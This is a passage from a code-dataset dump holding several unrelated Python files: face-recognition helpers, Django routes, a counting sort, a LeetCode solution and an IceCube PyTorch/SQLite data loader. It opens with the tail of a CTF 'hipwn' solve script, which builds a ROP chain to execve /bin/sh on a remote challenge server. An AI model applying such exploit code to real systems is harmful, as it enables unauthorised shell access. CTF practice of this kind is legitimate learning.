p64(addr_gets)\n\npayload += p64(addr_pop_rdi)\npayload += p64(addr_buf)\npayload += p64(addr_pop_rsi_r15)\npayload += p64(addr_buf + 0x18)\npayload += p64(0xdeadbeefcafebabe)\npayload += p64(addr_pop_rdx)\npayload += p64(addr_buf + 0x18)\npayload += p64(addr_pop_rax)\npayload += p64(59)\n\npayload += p64(addr_syscall)\n\n\nbuf = b''\nbuf += b'/bin/sh\\x00'\nbuf += p64(0) # @ addr_buf + 0x8\nbuf += p64(0) # @ addr_buf + 0x10\nbuf += p64(0) # @ addr_buf + 0x18\n\n\nbinpath = './chall'\nelf = ELF(binpath)\ncontext.binary = elf\ncontext.terminal = ['tmux', 'split-w', '-h']\ncontext.log_level = 'DEBUG'\n\ngdbscript = '''\ngef\n# before return\nb *0x000000000040019c\n# return from gets\nb *0x000000000400590\n# syscall\nb *0x40255e\nignore 2 1\nr\n'''\n# io = gdb.debug([binpath], aslr=False, gdbscript=gdbscript)\n# io = process(binpath)\nio = remote('13.231.207.73', 9010)\n# io = remote('localhost', 4088)\n\nio.recvuntil(b\"What's your team name?\\n\")\ntime.sleep(1)\nio.sendline(payload)\n# io.recvuntil(b'CTF 2020!\\n')\n\ntime.sleep(1)\nio.sendline(buf)\n\nio.interactive()\n\n# zer0pts{welcome_yokoso_osooseyo_huanying_dobropozhalovat}\n","sub_path":"zer0ptsctf2020/hipwn/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"206363745","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport random\nimport itertools\n\n\n# Compute number of images per person (assuming each face has same num of images)\ndef images_per_person(results):\n images_per_face = 0\n image_count = 0\n while images_per_face == 0:\n if results[image_count] == results[image_count + 1]:\n image_count += 1\n else:\n images_per_face = image_count + 1\n return images_per_face\n\n\n# Compute number of distinct faces in the data\ndef distinct_faces_num(total_faces_num, images_per_face):\n if total_faces_num % images_per_face != 0:\n raise ValueError(\"Have different number of image per face\")\n else:\n return int(total_faces_num / images_per_face)\n\n\n# Split training samples and test samples\ndef split_train_test(total_faces_num,\n test_image_per_face,\n images_per_face,\n num_of_distinct_faces,\n resolutions,\n faces,\n results):\n\n # Calculating the number of images, setting up for the training and test sample split\n train_image_per_face = images_per_face - test_image_per_face\n\n num_of_train_faces = train_image_per_face * num_of_distinct_faces\n num_of_test_faces = test_image_per_face * num_of_distinct_faces\n\n test_ratio = num_of_test_faces / total_faces_num\n\n faces_train = np.zeros((resolutions, num_of_train_faces))\n faces_test = np.zeros((resolutions, num_of_test_faces))\n results_train = np.zeros(num_of_train_faces)\n results_test = np.zeros(num_of_test_faces)\n\n # Split training samples and test samples\n for i in range(0, num_of_distinct_faces):\n state = random.randint(1, 100)\n start = i * images_per_face\n end = start + images_per_face\n single_face_arr = faces[:, start: end]\n single_face_result = results[start: end]\n faces_train_temp, faces_test_temp, results_train_temp, results_test_temp = train_test_split(single_face_arr.transpose(),\n single_face_result,\n test_size=test_ratio,\n random_state=state)\n start_train = start if start == 0 else start - test_image_per_face * i\n end_train = end - test_image_per_face * (i + 1)\n start_test = start if start == 0 else start - train_image_per_face * i\n end_test = end - train_image_per_face * (i + 1)\n faces_train[:, start_train: end_train] = faces_train_temp.transpose()\n faces_test[:, start_test: end_test] = faces_test_temp.transpose()\n results_train[start_train: end_train] = results_train_temp\n results_test[start_test: end_test] = results_test_temp\n\n return num_of_train_faces, num_of_test_faces, faces_train, faces_test, results_train, results_test\n\n\ndef normalization(vector):\n norm = np.linalg.norm(vector)\n vector /= norm\n\n\ndef print_image(image):\n # Rescale average training vector to gray scale matrix\n image_to_print = image.reshape(46, 56)\n\n # Show image\n image_to_print = image_to_print.T\n plt.imshow(image_to_print, cmap='gist_gray')\n plt.show()\n\n\ndef sample_reconstruction(num_of_faces, projections, resolutions, best_eigen_vectors, face_avg, M):\n train_faces_reconstructed = np.zeros((resolutions, num_of_faces), dtype=np.complex)\n\n # Reconstruct training faces as linear combination of the best M eigen vectors\n for i in range(0, projections.shape[0]):\n linear_combination_of_eigen_vectors = np.zeros((resolutions, 1), dtype=np.complex)\n for j in range(0, M):\n projection = projections[i][j]\n eigen_vector = best_eigen_vectors[j].reshape(resolutions, 1)\n linear_combination_of_eigen_vectors += eigen_vector * projection\n train_faces_reconstructed[:, i] = (face_avg + linear_combination_of_eigen_vectors).squeeze()\n\n return train_faces_reconstructed\n\n\ndef false_correct_image(results, test_results, test_samples, pca, is_lda=False):\n temp = results - test_results\n count = 0\n for i in range(len(temp)):\n if is_lda is False:\n if temp[i] == 0:\n plt.subplot(421 + count * 2)\n plt.title('Correct')\n image = test_samples[:, i].reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n plt.subplot(421 + count * 2 + 1)\n plt.title('Projected')\n image = pca.test_sample_reconstructed[:, i].real.reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n count += 1\n else:\n if temp[i] == 0:\n plt.subplot(221 + count)\n plt.title('Correct')\n image = test_samples[:, i].reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n count += 1\n if count == 2:\n break\n for i in range(len(temp)):\n if is_lda is False:\n if temp[i] != 0:\n plt.subplot(421 + count * 2)\n plt.title('Incorrect')\n image = test_samples[:, i].reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n plt.subplot(421 + count * 2 + 1)\n plt.title('Projected')\n image = pca.test_sample_reconstructed[:, i].real.reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n count += 1\n else:\n if temp[i] != 0:\n plt.subplot(221 + count)\n plt.title('Incorrect')\n image = test_samples[:, i].reshape(46, 56).T\n plt.imshow(image, cmap='gist_gray')\n count += 1\n if count == 4:\n break\n plt.show()\n\n\ndef image_comparison(pca):\n first_reconstructed_image = pca.test_sample_reconstructed[:, 0].real.reshape(46, 56).T\n second_reconstructed_image = pca.test_sample_reconstructed[:, 1].real.reshape(46, 56).T\n third_reconstructed_image = pca.test_sample_reconstructed[:, 2].real.reshape(46, 56).T\n first_test_image = pca.test_sample[:, 0].reshape(46, 56).T\n second_test_image = pca.test_sample[:, 1].reshape(46, 56).T\n third_test_image = pca.test_sample[:, 2].reshape(46, 56).T\n\n plt.subplot(321)\n plt.title('Actual')\n plt.imshow(first_test_image, cmap='gist_gray')\n plt.subplot(323)\n plt.imshow(second_test_image, cmap='gist_gray')\n plt.subplot(325)\n plt.imshow(third_test_image, cmap='gist_gray')\n plt.subplot(322)\n plt.title('Reconstructed')\n plt.imshow(first_reconstructed_image, cmap='gist_gray')\n plt.subplot(324)\n plt.imshow(second_reconstructed_image, cmap='gist_gray')\n plt.subplot(326)\n plt.imshow(third_reconstructed_image, cmap='gist_gray')\n plt.show()\n\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title + '\\n', fontsize=50)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label', fontsize=50)\n plt.xlabel('Predicted label', fontsize=50)\n plt.tight_layout()\n\n\ndef plot_eig_values(eig_values):\n y = eig_values[0:415].tolist()\n y.sort(reverse=True)\n x = range(len(y))\n plt.figure()\n plt.bar(x, y, 1)\n plt.xlabel(r'$\\lambda_i: i^{th}$' + ' eigenvalue')\n plt.ylabel('Real value')\n plt.title(r'$N_{train} - 1$' + ' Eigenvalues of $S_c$')\n\n plt.show()\n","sub_path":"image_data_processor.py","file_name":"image_data_processor.py","file_ext":"py","file_size_in_byte":8549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"490068383","text":"from django.urls import path\nfrom . import views\n\napp_name = 'sample'\n\nurlpatterns = [\n path('chartjs/', views.chart_js, name='chart_js'),\n path('chartSample/', views.chart_sample, name='chart_sample'),\n path('apiopen/', views.api_open, name='api_open'),\n path('oraconn/', views.ora_conn, name='ora_conn'),\n path('sqlexec/', views.sql_exec, name='sql_exec'),\n path('imageocr/', views.image_ocr, name='image_ocr'),\n path('emailsend/', views.email_send, name='email_send'),\n path('pandas/', views.pandas_sample, name='pandas_sample'),\n]","sub_path":"sample/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"446963387","text":"\n\ndef counting_sort(collection):\n \"\"\"\n # 不能排序负数\n coll_len = len(collection)\n coll_min = min(collection)\n coll_max = max(collection)\n\n coll_len_arr = coll_max - coll_min + 1\n count_arr = [0] * coll_len_arr\n\n for i in collection:\n count_arr[i] = count_arr[i] + 1\n\n index = 0\n coll_sorted = [0] * coll_len\n for i in range(coll_max + 1):\n for j in range(count_arr[i]):\n coll_sorted[index] = i\n index += 1\n\n return sorted\n \"\"\"\n coll_len = len(collection)\n coll_min = min(collection)\n coll_max = max(collection)\n\n coll_len_arr = coll_max - coll_min + 1\n count_arr = [0] * coll_len_arr\n\n for number in range(coll_len):\n count_arr[collection[number] - coll_min] += 1\n\n for i in range(1, len(count_arr)):\n count_arr[i] = count_arr[i] + count_arr[i - 1]\n\n sorted_arr = [0] * coll_len\n for i in range(coll_len):\n sorted_arr[count_arr[collection[i] - coll_min] - 1] = collection[i]\n count_arr[collection[i] - coll_min] -= 1\n\n return sorted_arr\n\n\ndef string_counting_sort(string):\n return ''.join([chr(i) for i in counting_sort([ord(c) for c in string])])\n\n\nif __name__ == \"__main__\":\n\n assert \"eghhiiinrsssttt\" == string_counting_sort(\"thisisthestring\")\n user_input = input(\"enter numbers separated by a comma:\\n\").strip()\n unsorted = [int(tmp) for tmp in user_input.split(',')]\n print(counting_sort(unsorted))\n","sub_path":"TheAlgorithms/Sorts/counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"212893240","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 12 20:40:20 2018\n\n@author: owen\n\"\"\"\n\n# https://leetcode.com/problems/contain-virus/solution/\nclass Solution:\n def containVirus(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n m,n=len(grid),len(grid[0])\n \n def neighbors(r,c):\n for nr,nc in ((r-1,c),(r,c-1),(r+1,c),(r,c+1)):\n if 0<=nr0.5)[0]\n # i2 = torch.where(targets[:, 0]<0.5)[0]\n # scalars1 = scalar_vars[i1].numpy()\n # scalars2 = scalar_vars[i2].numpy()\n # # plot it\n # d = {\n # 'data': [scalars1, scalars2],\n # 'density': [True, True],\n # 'calc_bin_width': True,\n # 'savefig': get_project_root() + '/scalars.png'\n # }\n # _ = make_plot(d)\n # # print(i1, i2)\n # l1 = lengths[i1]\n # l2 = lengths[i2]\n # # print('l1', l1)\n # # print('l2', l2)\n # s1 = sequences_padded[i1, :, :]\n # s2 = sequences_padded[i2, :, :]\n # # print(s1.shape[-1])\n # for i_seq in range(s1.shape[-1]):\n # f1 = np.array([])\n # for i_batch in range(s1.shape[0]):\n # length = l1[i_batch]\n # # feat = s1[i_batch, l1[:length], i_seq].numpy()\n # f1 = np.append(f1, s1[i_batch, :length, i_seq].numpy())\n \n # f2 = np.array([])\n # for i_batch in range(s2.shape[0]):\n # length = l2[i_batch]\n # # feat = s1[i_batch, l1[:length], i_seq].numpy()\n # f2 = np.append(f2, s2[i_batch, :length, i_seq].numpy())\n\n # # plot it\n # d = {\n # 'data': [f1, f2],\n # 'density': [True, True],\n # 'calc_bin_width': True,\n # 'savefig': get_project_root() + '/' + str(i_seq) + '.png'\n # }\n # _ = make_plot(d)\n # a+=1\n # DEBUGGING FINISHED \n return pack, (targets.float(), weights.float())\n\n def _permute(self, seqs, scalars, lengths):\n # For the sequential features, there are sum(lengths) variables to draw from (if we only permute in batch)\n # draw randomly with \n # Loop over indices of features to permute\n for index in self._permute_seq_features:\n\n # Make a scrambled bag of features\n entries = np.array([])\n for entry in seqs:\n entries = np.append(entries, entry[:, index].numpy()) \n \n # Generate a random sample with replacement for each sequence\n for i_seq, length in enumerate(lengths):\n seqs[i_seq][:, index] = torch.tensor(np.random.choice(entries, length))\n \n # Now do the same for scalar vars\n batch_size = scalars.shape[0]\n for index in self._permute_scalar_features:\n # Convert to numpy, retrieve a random sample, convert back to tensor\n scalars[:, index] = torch.tensor(np.random.choice(scalars[:, index].numpy(), batch_size))\n\n return seqs, scalars\n \n def _permute_seq(self, seqs): \n \n # Make a copy to ensure all sampling is from same distribution\n seqs_permuted = [seq.clone().detach()+0.0 for seq in seqs]\n n_seqs = len(seqs)\n seq_lengths = np.array([len(x) for x in seqs])\n for i_seq in range(n_seqs):\n # seq.shape = [seqlen, n_feats]\n # Find DOMs to change\n seqlen = seq_lengths[i_seq]\n if seqlen > 10:\n continue\n start = int(self._from_frac*seqlen + 0.5) # add half due to rounding\n end = int(self._to_frac*seqlen + 0.5) # add half due to rounding\n indices = np.arange(start, end)\n\n # Find which sequence (N) to pick DOM (frac)\n which_seq = np.random.randint(0, high=n_seqs, size=(len(indices),))\n which_dom = np.random.uniform(size=len(which_seq))*seq_lengths[which_seq]\n which_dom = which_dom.astype(int)\n\n # Insert copy\n before = seqs_permuted[i_seq].clone().detach()\n for index, seq_id, dom_id in zip(indices, which_seq, which_dom):\n seqs_permuted[i_seq][index, :] = seqs[seq_id][dom_id, :].clone().detach()\n\n return seqs_permuted\n\nclass SqliteFetcher:\n\n def __init__(self, db_path):\n\n self._path = str(db_path)\n self._tables = None\n self._len = None\n self._rows = None\n self._event_lengths_key = 'split_in_ice_pulses_event_length' \n self._max_events_per_query = 50000\n # self._fetch_query_seq = 'SELECT {features} FROM {table} WHERE event '\\\n\n self._fetch_query_seq = 'SELECT {features} FROM {table} WHERE event_no '\\\n 'IN ({events})'\n self._fetch_query = 'SELECT {features} FROM {table} WHERE event_no '\\\n 'IN ({events})'\n self._read_query = (\n 'SELECT {feature} FROM {table} WHERE {primary_key} IN ({nums})'\n )\n\n def __len__(self):\n return self._len\n \n @property\n def ids(self):\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = 'SELECT event_no FROM meta'\n cursor.execute(query)\n\n event_ids = [str(e[0]) for e in cursor.fetchall()]\n\n return event_ids\n \n @property\n def rows(self):\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = 'SELECT row FROM sequential'\n cursor.execute(query)\n\n rows = sorted([str(e[0]) for e in cursor.fetchall()])\n\n return rows\n\n @property\n def length(self):\n \n if not self._len:\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = 'SELECT event_no FROM meta'\n cursor.execute(query)\n\n event_nums = [e[0] for e in cursor.fetchall()]\n self._len = len(event_nums)\n \n return self._len\n \n @property\n def n_rows(self):\n \n if not self._rows:\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = 'SELECT COUNT(*) FROM sequential'\n cursor.execute(query)\n\n row_nums = cursor.fetchall()\n self._rows = row_nums[0][0]\n \n return self._rows\n \n @property\n def tables(self):\n\n if not self._tables:\n\n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n\n # Get table-names\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n cursor.execute(query)\n tables_data = {entry[0]: {} for entry in cursor.fetchall()}\n\n # Loop over all columns and fetch their info\n for name in tables_data:\n query = 'PRAGMA TABLE_INFO({tablename})'.format(\n tablename=name\n ) \n\n cursor.execute(query)\n col_data = cursor.fetchall()\n \n tables_data[name] = {e[1]: {\n 'type': e[2], \n 'index': e[0],\n }\n for e in col_data\n }\n \n self._tables = tables_data\n \n return self._tables\n \n def _fetch( self, ids, *queries):\n\n fetched = ()\n with sqlite3.connect(self._path) as db:\n for query in queries:\n cursor = db.cursor()\n cursor.execute(query, ids)\n fetched = fetched + (cursor.fetchall(),)\n\n return fetched\n\n def _make_dict(\n self, \n events, \n names_scalar, \n fetched_scalar,\n names_sequential, \n fetched_sequential,\n names_meta, \n fetched_meta,\n event_lengths\n ):\n \n # get the from- and to-indices of each event.\n cumsum = np.append([0], np.cumsum([entry[0] for entry in event_lengths]))\n all_from = cumsum[:-1]\n all_to = cumsum[1:]\n\n # Create dictionary. First level is event\n data_dict = {}\n for i_event, event in enumerate(events):\n \n # Second level is data\n data_dict[event] = {}\n\n # order the data from fetched_scalar\n from_, to_ = all_from[i_event], all_to[i_event]\n for i_name, name in enumerate(names_sequential):\n data = [\n entry[i_name] for entry in fetched_sequential[from_:to_]\n ]\n data_dict[event][name] = np.array(data)\n\n # Do the same for scalar data\n for i_name, name in enumerate(names_scalar):\n data_dict[event][name] = fetched_scalar[i_event][i_name]\n \n # .. And finally meta\n for i_name, name in enumerate(names_meta):\n data_dict[event][name] = fetched_meta[i_event][i_name]\n \n return data_dict\n\n def fetch_features(\n self,\n all_events=[],\n scalar_features=[],\n seq_features=[],\n meta_features=[],\n reg_type=None\n ):\n \n # Connect to DB and set cursor\n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n n_events = len(all_events)\n # Ensure some events are passed\n if n_events == 0:\n raise ValueError('NO EVENTS PASSED TO SQLFETCHER')\n\n # If events are not strings, raise error\n if not isinstance(all_events[0], str):\n raise ValueError('SqliteFetcher: IDs must be strings!')\n\n if 'event_no' in scalar_features or 'event_no' in meta_features:\n raise KeyError('event_no cannot be requested!')\n\n # load over several rounds\n n_chunks = n_events//self._max_events_per_query\n chunks = np.array_split(all_events, max(1, n_chunks))\n\n base_query = 'SELECT {features} FROM {table} WHERE event_no '\\\n 'IN ({events})'\n base_seq_query = 'SELECT {features} FROM {table} WHERE event '\\\n 'IN ({events})'\n \n fetched_scalar, fetched_sequential, fetched_meta = [], [], []\n \n # Process chunks\n all_dicted_data = {}\n for events in chunks:\n # Write query for scalar table and fetch all matching rows\n if len(scalar_features) > 0:\n query = base_query.format(\n features=', '.join(scalar_features),\n table='scalar',\n events=', '.join(['?'] * len(events))\n )\n\n cursor.execute(query, events)\n fetched_scalar = cursor.fetchall()\n\n # Write query for sequential table and fetch all matching rows\n if len(seq_features)>0:\n query = base_seq_query.format(\n features=', '.join(seq_features),\n table='sequential',\n events=', '.join(['?'] * len(events))\n )\n\n cursor.execute(query, events)\n fetched_sequential = cursor.fetchall()\n \n # Write query for meta table and fetch all matching rows\n if len(meta_features)>0:\n query = base_query.format(\n features=', '.join(meta_features),\n table='meta',\n events=', '.join(['?'] * len(events))\n )\n cursor.execute(query, events)\n fetched_meta = cursor.fetchall()\n\n # Finally, fetch event lengths as they are needed for making \n # sequential dictionary\n query = base_query.format(\n features=self._event_lengths_key,\n table='meta',\n events=', '.join(['?'] * len(events))\n )\n cursor.execute(query, events)\n event_lengths = cursor.fetchall()\n\n # Put in a dictionary and update all_dicted_ata\n dicted_data = self._make_dict(\n events, scalar_features, fetched_scalar, seq_features,\n fetched_sequential, meta_features, fetched_meta, event_lengths\n )\n all_dicted_data.update(dicted_data)\n \n return all_dicted_data\n\n def make_batch(\n self,\n ids=[],\n scalars=[],\n seqs=[],\n targets=[],\n weights=[],\n mask=[],\n reg_type=None\n ):\n \n n_events = len(ids)\n # Ensure some events are passed\n if n_events == 0:\n raise ValueError('NO EVENTS PASSED TO SQLFETCHER')\n\n # If events are not strings, convert them\n if not isinstance(ids[0], str):\n raise ValueError('Events must be IDs as strings')\n \n if weights == []:\n NO_WEIGHTS = True\n else:\n NO_WEIGHTS = False\n\n # Prepare single-number queries\n scalar_cols = ['scalar.'+e for e in scalars]\n if reg_type in CLASSIFICATION:\n target_cols = ['meta.particle_code']\n else:\n target_cols = ['scalar.'+e for e in targets]\n\n lengths_key = ['meta.split_in_ice_pulses_event_length']\n weights_col = ['scalar.'+e for e in weights]\n\n all_single_val_feats = scalar_cols+target_cols+weights_col+lengths_key\n singles_query = 'SELECT {features} FROM scalar INNER JOIN meta ON scalar.event_no=meta.event_no WHERE scalar.event_no IN ({events})'.format(\n features=', '.join(all_single_val_feats),\n events=', '.join(['?'] * n_events)\n )\n \n # Prepare sequences-query\n all_seq_cols_feats = seqs+mask\n seq_query = 'SELECT {features} FROM sequential WHERE event_no IN ({events})'.format(\n features=', '.join(all_seq_cols_feats),\n events=', '.join(['?'] * n_events)\n )\n\n # Make fetch\n singles, sequences = self._fetch(ids, singles_query, seq_query)\n\n # prepare the batch\n batch = [()]*n_events\n\n # get the from- and to-indices of each event.\n lengths = np.array(\n [\n entry[-1] for entry in singles\n ]\n )\n cumsum = np.append([0], np.cumsum(lengths))\n all_from = cumsum[:-1]\n all_to = cumsum[1:]\n \n n_scalars = len(scalars)\n n_targets = len(target_cols)\n n_seqs = len(seqs)\n for i_event in range(n_events):\n \n # Make scalar, weights and target arrays. Weights is always \n # second \n scalar_arr = np.array(singles[i_event][:n_scalars])\n\n # Handle classification differently \n # - we manually convert particle code to a one-hot encoding\n if reg_type in CLASSIFICATION:\n particle_code = singles[i_event][n_scalars:n_scalars+n_targets][0]\n if reg_type == 'nue_numu':\n if particle_code == 120000:\n target_arr = np.array([1.0, 0.0])\n elif particle_code == 140000:\n target_arr = np.array([0.0, 1.0])\n elif reg_type == 'nue_numu_nutau':\n if particle_code == 120000:\n target_arr = np.array([1.0, 0.0, 0.0])\n elif particle_code == 140000:\n target_arr = np.array([0.0, 1.0, 0.0])\n else:\n target_arr = np.array([0.0, 0.0, 1.0])\n else:\n raise ValueError('Unknown classification encountered')\n else:\n target_arr = np.array(\n singles[i_event][n_scalars:n_scalars+n_targets]\n )\n \n if NO_WEIGHTS:\n weight = 1.0\n else:\n weight = singles[i_event][-2]\n \n # Make sequential array\n # Since each DOM is stored as a row, we first get the to- and \n # from-rows that combine to an event\n from_, to_ = all_from[i_event], all_to[i_event]\n # We then create our mask - a Boolean array saying whether a \n # DOM is included or not\n masked_indices = np.array([e[-1] for e in sequences[from_:to_]], dtype=bool)\n n_doms = np.sum(masked_indices)\n # Now loop over variables and extract them\n seq_arr = np.zeros((n_seqs, n_doms))\n for i_var in range(n_seqs):\n seq_arr[i_var, :] = np.array(\n [\n dom[i_var] for dom in sequences[from_:to_]\n ]\n )[masked_indices]\n\n # Add to list of events\n batch[i_event] = (seq_arr, scalar_arr, target_arr, weight)\n\n return batch\n\n def read(self, table, feature, primary_key, nums):\n # If events are not strings, convert them\n if not isinstance(nums[0], str):\n raise ValueError('Events must be IDs as strings')\n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n query = self._read_query.format(\n # feature=', '.join([feature, primary_key]),\n feature=feature,\n table=table,\n primary_key=primary_key,\n nums=', '.join(['?'] * len(nums))\n )\n \n cursor.execute(query, nums)\n fetched = cursor.fetchall()\n converted = np.array([\n e[0] for e in fetched\n ])\n # ids = np.array([\n # e[1] for e in fetched\n # ])\n return converted#, ids\n \n def write(\n self, table, name, ids, values, primary_key='event_no', astype='REAL'\n ):\n\n n_events = len(ids)\n n_values = len(values)\n \n # Ensure some events are passed\n if n_events == 0:\n raise ValueError('NO EVENTS PASSED TO SQLFETCHER')\n \n # Ensure a matching amount of values and IDs are passed\n if n_events != n_values:\n raise ValueError('Number of IDs (%d) and values (%d) does not match'\n %(n_events, n_values))\n\n # If events are not strings, convert them\n if not isinstance(ids[0], str):\n raise ValueError('Events must be IDs as strings')\n \n with sqlite3.connect(self._path) as db:\n cursor = db.cursor()\n\n # Check if column exists - if not, create it.\n if not name in self.tables[table]:\n query = 'ALTER TABLE {table} ADD COLUMN {name} {astype}'.format(\n table=table,\n name=name,\n astype=astype\n )\n cursor.execute(query)\n \n # Write data to column\n query = 'UPDATE {table} SET {name}=? WHERE {primary_key}=?'.format(\n table=table,\n name=name,\n primary_key=primary_key\n )\n cursor.executemany(query, [[e[0], e[1]] for e in zip(values, ids)])\n db.commit()\n\n\nclass SqliteLoader(data.Dataset):\n '''A Pytorch dataloader for neural nets with sequential and scalar variables. This dataloader does not load data into memory, but opens a h5-file, reads and closes the file again upon every __getitem__.\n\n Input: Directory to loop over, targetnames, scalar feature names, sequential feature names, type of set (train, val or test), train-, test- and validation-fractions and an optional datapoints_wanted.\n '''\n def __init__(\n self, \n directory, \n seq_features, \n scalar_features, \n targets, \n masks=['all'], \n n_events_wanted=np.inf, \n weights='None', \n dom_mask='SplitInIcePulses', \n max_seq_len=np.inf, \n keyword=None, \n batch_size=None,\n ensemble=[],\n db_path=None,\n reg_type=None\n ):\n if batch_size == None:\n raise ValueError('A batchsize must be specified!')\n if db_path == None:\n raise ValueError('A DB must be supplied!')\n\n self.directory = get_project_root() + directory\n\n self.scalar_features = scalar_features\n self.seq_features = seq_features\n self.targets = targets\n self.keyword = keyword\n self.reg_type = reg_type\n\n self.n_scalar_features = len(scalar_features)\n self.n_seq_features = len(seq_features)\n self.n_targets = len(targets)\n\n self.masks = masks\n self.n_events_wanted = n_events_wanted\n self.max_seq_len = max_seq_len\n self.batch_size = batch_size\n self.db_path = db_path\n self.db = SqliteFetcher(db_path)\n\n # ! Another method used: right now predictions saved in DB.\n # self.ensemble, self.ensemble_inputs = self._load_ensemble(ensemble)\n\n # 'SplitInIcePulses' corresponds to all DOMs\n # 'SRTInIcePulses' corresponds to Icecubes cleaned doms\n self.dom_mask = [dom_mask]\n self.keyword = keyword\n self.weights = [weights] if weights != 'None' else [] # To be determined in get_meta_information\n self.len = None # To be determined in get_meta_information\n self.indices = None # To be determined in get_meta_information\n\n self._get_meta_information()\n if keyword != 'predict':\n self.shuffle_indices()\n\n def __getitem__(self, index):\n from_, to_ = index*self.batch_size, (index+1)*self.batch_size\n ids = [str(entry) for entry in self.indices[from_:to_]]\n \n # Load batch - gets list back with tuples \n # (seq_arr, scalar_arr, target_arr). Add weights afterwards.\n batch = self.db.make_batch(\n ids=ids, \n scalars=self.scalar_features, \n seqs=self.seq_features, \n targets=self.targets,\n weights=self.weights, \n mask=self.dom_mask,\n reg_type=self.reg_type\n )\n \n # Tuple is now passed to collate_fn - handle training and predicting\n # differently. We need the name of the event for prediction to log\n # which belongs to which\n if self.keyword == 'predict':\n pack = [\n e+(self.keyword, int(ids[i_event])) for i_event, e in enumerate(batch)\n ]\n\n else:\n pack = [\n e+(self.keyword, ) for i_event, e in enumerate(batch)\n ]\n \n return pack\n\n def __len__(self):\n return self.len\n\n def __repr__(self):\n return 'SqliteLoader'\n\n def _get_meta_information(self):\n '''Extracts filenames, calculates indices induced by train-, val.- and test_frac\n '''\n\n # Get mask\n if self.db_path == PATH_TRAIN_DB:\n _keyword = 'train'\n elif self.db_path == PATH_VAL_DB:\n _keyword = 'val'\n \n self.indices = np.array(\n load_sqlite_mask(\n self.directory, self.masks, _keyword\n )\n )\n \n # If training, only use full batches.\n if self.keyword == 'train':\n self.len = min(\n self.n_events_wanted, len(self.indices)\n )//self.batch_size\n # If not, predict on everything \n else:\n self.len = int(\n np.ceil(\n min(\n self.n_events_wanted, len(self.indices)\n )/self.batch_size\n )\n ) \n \n def _load_ensemble(self, ensemble):\n # Load ensemble (if given)\n models = []\n \n for entry in ensemble:\n member = {}\n path = locate_model(entry)\n member['model'] = load_best_model(path)\n member['seq_feat'], member['scalar_feat'] = find_model_input_vars(path)\n models.append(member)\n print(member)\n \n return models\n\n def shuffle_indices(self):\n random.shuffle(self.indices)\n\n#* ======================================================================== \n#* DATALOADER FUNCTIONS\n#* ========================================================================\n\ndef load_data(\n hyper_pars, \n data_pars, \n architecture_pars, \n meta_pars, \n keyword, \n file_list=None, \n drop_last=False, \n debug_mode=False, \n db_path=None\n ):\n\n if db_path == None:\n raise ValueError('A DB path must be supplied!')\n\n data_dir = data_pars['data_dir'] # WHere to load data from\n seq_features = data_pars['seq_feat'] # feature names in sequences (if using LSTM-like network)\n scalar_features = data_pars['scalar_feat'] # feature names\n targets = get_target_keys(data_pars, meta_pars) # target names\n # particle_code = get_particle_code(data_pars['particle'])\n # how much data should be trained on?\n train_frac = data_pars.get('train_frac', None) \n # how much data should be used for validation?\n val_frac = data_pars.get('val_frac', None) \n # how much data should be used for training\n test_frac = data_pars.get('test_frac', None) \n # which cleaning lvl and transform should be applied?\n file_keys = data_pars.get('file_keys', None) \n mask_names = data_pars['masks']\n weights = data_pars.get('weights', 'None')\n dom_mask = data_pars.get('dom_mask', 'SplitInIcePulses')\n max_seq_len = data_pars.get('max_seq_len', np.inf)\n batch_size = hyper_pars.get('batch_size', None)\n # TODO: Ensure robust loading of ensemble\n ensemble = data_pars.get('ensemble', [])\n regression = meta_pars['group']\n \n if keyword == 'train':\n drop_last = True\n batch_size = hyper_pars['batch_size']\n n_events_wanted = data_pars.get('n_train_events_wanted', np.inf)\n elif keyword == 'val':\n batch_size = data_pars['val_batch_size']\n n_events_wanted = data_pars.get('n_val_events_wanted', np.inf)\n elif keyword == 'predict':\n batch_size = data_pars['val_batch_size']\n n_events_wanted = data_pars.get('n_predictions_wanted', np.inf)\n if file_keys:\n prefix = 'transform'+str(file_keys.get('transform', 